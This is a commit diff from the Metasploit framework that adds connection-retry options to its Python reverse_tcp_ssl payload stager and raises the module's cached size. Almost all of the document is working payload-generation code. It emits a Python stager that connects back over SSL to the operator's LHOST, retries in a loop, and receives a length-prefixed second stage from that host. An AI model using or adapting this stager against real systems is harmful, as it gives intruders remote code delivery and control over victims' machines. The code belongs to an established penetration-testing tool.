Land #8340, add exception handling for rev_tcp_ssl

bug/bundler_fix
Spencer McIntyre 2017-06-06 19:09:15 -04:00
commit 834e0eba95
No known key found for this signature in database
GPG Key ID: C00D6B6AA5E15412
2 changed files with 34 additions and 6 deletions

View File

@ -15,6 +15,13 @@ module Payload::Python::ReverseTcpSsl
include Msf::Payload::Python include Msf::Payload::Python
include Msf::Payload::Python::ReverseTcp include Msf::Payload::Python::ReverseTcp
def initialize(*args)
super
register_advanced_options([
OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 10]),
OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5])
], self.class)
end
# #
# Generate the first stage # Generate the first stage
@ -22,7 +29,9 @@ module Payload::Python::ReverseTcpSsl
def generate def generate
conf = { conf = {
port: datastore['LPORT'], port: datastore['LPORT'],
host: datastore['LHOST'] host: datastore['LHOST'],
retry_count: datastore['StagerRetryCount'],
retry_wait: datastore['StagerRetryWait'],
} }
generate_reverse_tcp_ssl(conf) generate_reverse_tcp_ssl(conf)
@ -42,10 +51,29 @@ module Payload::Python::ReverseTcpSsl
def generate_reverse_tcp_ssl(opts={}) def generate_reverse_tcp_ssl(opts={})
# Set up the socket # Set up the socket
cmd = "import ssl,socket,struct\n" cmd = "import ssl,socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n"
cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2 if opts[:retry_wait].blank? # do not retry at all (old style)
cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n" cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
cmd << "s=ssl.wrap_socket(so)\n" cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
cmd << "s=ssl.wrap_socket(so)\n"
else
if opts[:retry_count] > 0
cmd << "for x in range(#{opts[:retry_count].to_i}):\n"
else
cmd << "while 1:\n"
end
cmd << "\ttry:\n"
cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2
cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n"
cmd << "\t\ts=ssl.wrap_socket(so)\n"
cmd << "\t\tbreak\n"
cmd << "\texcept:\n"
if opts[:retry_wait].to_i <= 0
cmd << "\t\tpass\n" # retry immediately
else
cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting
end
end
cmd << py_send_uuid if include_send_uuid cmd << py_send_uuid if include_send_uuid
cmd << "l=struct.unpack('>I',s.recv(4))[0]\n" cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
cmd << "d=s.recv(l)\n" cmd << "d=s.recv(l)\n"

View File

@ -8,7 +8,7 @@ require 'msf/core/payload/python/reverse_tcp_ssl'
module MetasploitModule module MetasploitModule
CachedSize = 378 CachedSize = 470
include Msf::Payload::Stager include Msf::Payload::Stager
include Msf::Payload::Python::ReverseTcpSsl include Msf::Payload::Python::ReverseTcpSsl